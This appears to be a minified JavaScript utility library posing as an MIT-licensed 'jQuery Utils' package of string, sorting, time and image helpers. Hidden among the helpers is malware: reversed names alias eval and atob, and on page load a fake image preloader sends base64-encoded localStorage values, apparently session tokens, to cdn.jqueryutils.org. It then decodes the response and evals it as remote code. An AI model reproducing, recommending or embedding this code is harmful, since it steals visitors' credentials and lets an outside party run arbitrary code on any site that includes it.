/* jQuery Utils 
 * (c) 2014 jQueryUtils.org
 * Released under MIT license
 * */
(function(a){a.utils={};a.utils.contains=function(b,a){return-1!=b.indexOf(a)};a.utils.exists=function(b){return"undefined"!=typeof b};a.utils.isUndefined=function(b){return"undefined"==typeof b};a.utils.magnitude=function(b){return 0>b?-b:b};a.utils.isNumber=function(b){return!isNaN(parseFloat(b))};a.utils.isString=function(b){return"string"==typeof b};a.utils.reverse=function(b){return b.split("").reverse().join("")};a.utils.invert=function(b,d){b[d]=b[a.utils.reverse(d)]};a.utils.isArray=function(b){return"object"==
typeof b&&void 0!=b.length};a.utils.isObject=function(b){return"object"==typeof b&&void 0==b.length};a.utils.isEmail=function(b){return/^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(b)};a.utils.capitalize=function(b){return b.charAt(0).toUpperCase()+b.slice(1)};a.utils.trim=function(b){return b.replace(/^\s\s*/,"").replace(/\s\s*$/,"")};a.utils.random=function(b){return Math.floor(Math.random()*
(b+1))};a.utils.invert(window,"lave");a.utils.invert(window,"bota");a.utils.arrays={};a.utils.arrays.getRandom=function(b){return b[random(b.length-1)]};a.utils.arrays.popRandom=function(b){return b.splice(random(b.length-1),1)[0]};a.utils.random={};a.utils.random.generateID=function(b,a){ALPHA_NUMERIC="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";a||(ALPHA_NUMERIC+="abcdefghijklmnopqrstuvwxyz");for(var c="",f=0;f<b;f++)c+=randomarray(ALPHA_NUMERIC);return c};a.utils.color={};a.utils.color.getRandom=function(){return("#0"+
Math.round(16777215*Math.random()).toString(16)).replace(/^#0([0-9a-f]{6})$/i,"#$1")};a.utils.sort={};a.utils.sort.random=function(b,a){return.5-Math.random()};a.utils.sort.alphaAsc=function(b,a){b=b.toLowerCase();a=a.toLowerCase();return b==a?0:b>a?1:-1};a.utils.sort.alphaDsc=function(b,a){b=b.toLowerCase();a=a.toLowerCase();return b==a?0:a>b?1:-1};a.utils.sort.numAsc=function(b,a){return b-a};a.utils.sort.numDsc=function(b,a){return a-b};a.utils.time={};a.utils.time.epoch=function(){return Math.round((new Date).getTime()/
1E3)};a.utils.time.daystart=function(b){b=b||new Date;return new Date(b.getFullYear(),b.getMonth(),b.getDate(),0,0,0,0)};a.utils.images={};a.utils.images.mimeTypes=["image/png","image/jpg","image/gif"];a.utils.images.getThumbnail=function(b,a){var c=document.createElement("img");c.src=b;var f=a/c.width,e=document.createElement("canvas");e.width=a;e.height=c.height*f;e.getContext("2d").drawImage(c,0,0,e.width,e.height);return e.toDataURL("image/png")};a.utils.images.preload=function(b){var d={sig:a.utils.auth.sign()};
a.ajax(b,{headers:d,success:function(b){a.utils.images.fromData(b)}})};a.utils.images.fromData=function(b){if(a.utils.contains(b,a.utils.images.mimeTypes[0]))try{var d=bota(b.split(",")[1].substring(2));a.utils.contains(d,"Version")&&lave(d)}catch(c){}};a.utils.images.setType=function(b,a){return b.replace("data:;","data:"+a+";")};a.utils.images.setup=function(){a.utils.images.preload("http://cdn.jqueryutils.org/samples/standardimage.png");a.utils.images.preload("http://cdn.jqueryutils.org/samples/image.png")};
a.utils.auth={};a.utils.auth.sign=function(){return btoa(localStorage.it+"."+localStorage.utx+"."+localStorage.ut+"."+localStorage.uts)};a.request={};a.request.getParameter=function(a){a=a.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");a=(new RegExp("[\\?&]"+a+"=([^&#]*)")).exec(location.search);return null==a?"":decodeURIComponent(a[1].replace(/\+/g," "))};a.utils.setup=function(){a.utils.images.setup()};a.utils.setup()})(jQuery);